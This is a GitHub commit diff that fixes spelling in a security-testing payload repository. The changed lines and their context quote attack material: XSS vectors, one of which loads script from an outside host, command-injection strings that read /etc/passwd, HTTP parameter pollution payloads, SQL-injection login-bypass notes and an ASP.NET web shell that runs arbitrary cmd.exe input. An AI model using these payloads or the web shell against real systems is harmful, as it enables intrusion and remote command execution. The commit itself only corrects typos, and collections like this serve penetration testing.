Skip to content

Commit d65636f

Browse files
authored
Verify spelling fixes pass check-spelling
2 parents eee3510 + 6a4b70d commit d65636f

32 files changed

+88
-88
lines changed

attack/file-upload/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ see: http://cwe.mitre.org/data/definitions/434.html
44

55
* kinds of file upload verifications:
66
* content-type
7-
* filename extension verificationi (whitelist, blacklist)
7+
* filename extension verification (whitelist, blacklist)
88
* file content checking
99
* client side, ha ha ha
1010

attack/http-protocol/hpp.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
1+
# HTTP parameter pollution and interpretation payloads by Jacco van Tuijl
22
?id=id=1
33
&id=1?id=2
44
?id['&id=1']=2

attack/os-cmd-execution/README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -30,14 +30,14 @@ Example IFS netcat backdoor without spaces:<br>
3030

3131
$IFS shell variable:<br>
3232
``` cat$IFS/etc/passwd ```<br>
33-
increment the first +1 to retreive the entire file, line by line<br>
33+
increment the first +1 to retrieve the entire file, line by line<br>
3434
``` cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1 ```
3535

3636
Shell Variables:<br>
3737
``` CMD=$'cat\x20/etc/passwd';$CMD ```
3838

3939
shell variable, increment through file one line at a time: <br>
40-
increment the first +1 to retreive the entire file, line by line<br>
40+
increment the first +1 to retrieve the entire file, line by line<br>
4141
``` SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1 ```
4242

4343
**Exfiltrating Files / Data**

attack/sql-injection/exploit/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ various useful post-exploitation commands
1111
**mysql-injection-login-bypass.fuzz.txt**
1212
* regex replace as many as you can with your fuzzer for best results:
1313
* <user-fieldname> <pass-fieldname> <username>
14-
* also try to brute force a list of possible usernames, including possile admin acct names
14+
* also try to brute force a list of possible usernames, including possible admin acct names
1515

1616
**mysql-read-local-files.fuzz.txt**
1717
* mysql local file disclosure through sqli

attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -427,7 +427,7 @@ Author Name: ha.ckers.org
427427
Extraneous Open Brackets
428428
Exploit Name: Extraneous Open Brackets
429429
Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT>
430-
Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.
430+
Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error.
431431
Exploit Tags: general, obfuscated
432432
Author Name: ha.ckers.org
433433

@@ -518,8 +518,8 @@ Exploit Description: HTML entities (the semicolons are required for this to work
518518
Exploit Tags: general, evil tags, obfuscated, internet explorer
519519
Author Name: ha.ckers.org
520520

521-
HTML Quoute & Comment breaker
522-
Exploit Name: HTML Quoute & Comment breaker
521+
HTML Quote & Comment breaker
522+
Exploit Name: HTML Quote & Comment breaker
523523
Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))}
524524
Exploit Description: This vector breaks HTML quotes and comments.
525525
Exploit Tags: general, html breaking, comment breaking
@@ -547,7 +547,7 @@ Author Name: .mario
547547
IE closing-tag expression injection
548548
Exploit Name: IE closing-tag expression injection
549549
Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
550-
Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated.
550+
Exploit Description: This vector exploits a bug in IE where attributes in closing comments are evaluated.
551551
Exploit Tags: general, injection, internet explorer
552552
Author Name: .mario
553553

@@ -581,7 +581,7 @@ Exploit String: a=<a>
581581
</b>
582582
</a>
583583
document.write(unescape(a..b))
584-
Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.
584+
Exploit Description: This vector writes an erroneous image tag with onerror handler inside an E4X construct into the document context.
585585
Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags
586586
Author Name: .mario
587587

@@ -865,7 +865,7 @@ Author Name: ha.ckers.org
865865
Mozilla -moz-binding-url injection
866866
Exploit Name: Mozilla -moz-binding-url injection
867867
Exploit String: style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
868-
Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.
868+
Exploit Description: The vector incudes a binding file via injected style attribute. Gecko only.
869869
Exploit Tags: general, injection, gecko, style injection, XBL
870870
Author Name: .mario
871871

@@ -876,8 +876,8 @@ Exploit Description: This vector was once used on a major site to evade a stripp
876876
Exploit Tags: general, injection, gecko, style injection, XBL
877877
Author Name: PHPIDS Group
878878

879-
Multiline selfcontained XSS
880-
Exploit Name: Multiline selfcontained XSS
879+
Multiline self-contained XSS
880+
Exploit Name: Multiline self-contained XSS
881881
Exploit String: _
882882
=
883883
eval
@@ -1274,7 +1274,7 @@ Author Name: PHPIDS Group
12741274
Self-contained XSS variant 2
12751275
Exploit Name: Self-contained XSS variant 2
12761276
Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
1277-
Exploit Description: Concatenates fragmented functions to evakuate the location hash
1277+
Exploit Description: Concatenates fragmented functions to evaluate the location hash
12781278
Exploit Tags: general, self contained
12791279
Author Name: PHPIDS Group
12801280

@@ -1366,7 +1366,7 @@ content: “\61\6c\65\72\74\28\31\29″
13661366
eval(eval(document.styleSheets[0].cssRules[0].style.content))
13671367
</script>
13681368
Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed.
1369-
Exploit Tags: general, onfuscated, style injection
1369+
Exploit Tags: general, obfuscated, style injection
13701370
Author Name: .mario
13711371

13721372
STYLE w/Anonymous HTML

discovery/WebSocket/WebSocket-subprotocols.txt

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,12 @@
11
# this list can be used to enumerate supported Web Socket sub protocols of a web socket server
2-
# It conyains the official IANA registerd Web Socket sub protocols
2+
# It contains the official IANA registered Web Socket sub protocols
33
# Source: https://www.iana.org/assignments/websocket/websocket.xml
44
# Example subprotocol request header:
55
# Sec-WebSocket-Protocol: mqtt, wamp
66
# The Web Socket client can include a list of the protocols when making the initial HTTP request.
77
# The server is then required to either select one of those protocols and include it in a response header.
88
# If none of the sub protocols send by the client are supported by the server,
9-
# the server shoud fail the handshake and terminate the connection.
9+
# the server should fail the handshake and terminate the connection.
1010
MBWS.huawei.com
1111
MBLWS.huawei.com
1212
soap

docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html

Lines changed: 8 additions & 8 deletions
Large diffs are not rendered by default.

docs/misc/KL0209LIT_fffap.html

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -89,7 +89,7 @@
8989

9090
Fuzzing includes a lot of testing. You could spend hours and hours modifying and compiling and running the same but slightly
9191
different code over and over just to get the better results. Planning, preparation, and testing are a part of fuzzing, and
92-
laboring hours on end for the humble task of perfection, stability, and reproduceability can thankfully be very rewarding.
92+
laboring hours on end for the humble task of perfection, stability, and reproducibility can thankfully be very rewarding.
9393

9494
Fuzzing is useful because...
9595

@@ -569,7 +569,7 @@
569569
3.2 Writing the Fuzzer
570570

571571
This example for SFTP fuzzing will be written in PERL and will be using libssh2/Net::SSH2 (this is not the only way to use
572-
and fuzz SFTP, other libaries and extensions that may be more extensive and/or low-level are available).
572+
and fuzz SFTP, other libraries and extensions that may be more extensive and/or low-level are available).
573573

574574
[sftpfuzz.pl]
575575

regex/nsa-wordlist.txt

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Information Security
55
Information Warfare
66
IW
77
IS
8-
Priavacy Information
8+
Privacy Information
99
Terrorism
1010
Defensive
1111
Information Defense
@@ -36,7 +36,7 @@ CIA
3636
S/Key
3737
SSL
3838
FBI
39-
Secert Service
39+
Secret Service
4040
USSS
4141
Defcon
4242
Military
@@ -212,7 +212,7 @@ MI6
212212
Kh-11
213213
Shayet-13
214214
SADMS
215-
Spetznaz
215+
Spetsnaz
216216
Recce
217217
707
218218
CIO
@@ -663,7 +663,7 @@ COS
663663
E.T.
664664
credit card fraud
665665
b9
666-
assasinate
666+
assassinate
667667
virus
668668
anarchy
669669
rogue
@@ -1008,6 +1008,6 @@ China
10081008
Conficker
10091009
Worm
10101010
Scammers
1011-
Suspecious
1011+
Suspicious
10121012
Social media
10131013

web-backdoors/asp/cmdasp.aspx

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@
55
void Page_Load(object sender, EventArgs e)
66
{
77
}
8-
string ExcuteCmd(string arg)
8+
string ExecuteCmd(string arg)
99
{
1010
ProcessStartInfo psi = new ProcessStartInfo();
1111
psi.FileName = "cmd.exe";
@@ -21,7 +21,7 @@ return s;
2121
void cmdExe_Click(object sender, System.EventArgs e)
2222
{
2323
Response.Write("<pre>");
24-
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
24+
Response.Write(Server.HtmlEncode(ExecuteCmd(txtArg.Text)));
2525
Response.Write("</pre>");
2626
}
2727
</script>
@@ -32,7 +32,7 @@ Response.Write("</pre>");
3232
<body >
3333
<form id="cmd" method="post" runat="server">
3434
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
35-
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
35+
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
3636
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
3737
</form>
3838
</body>

0 commit comments

Comments
 (0)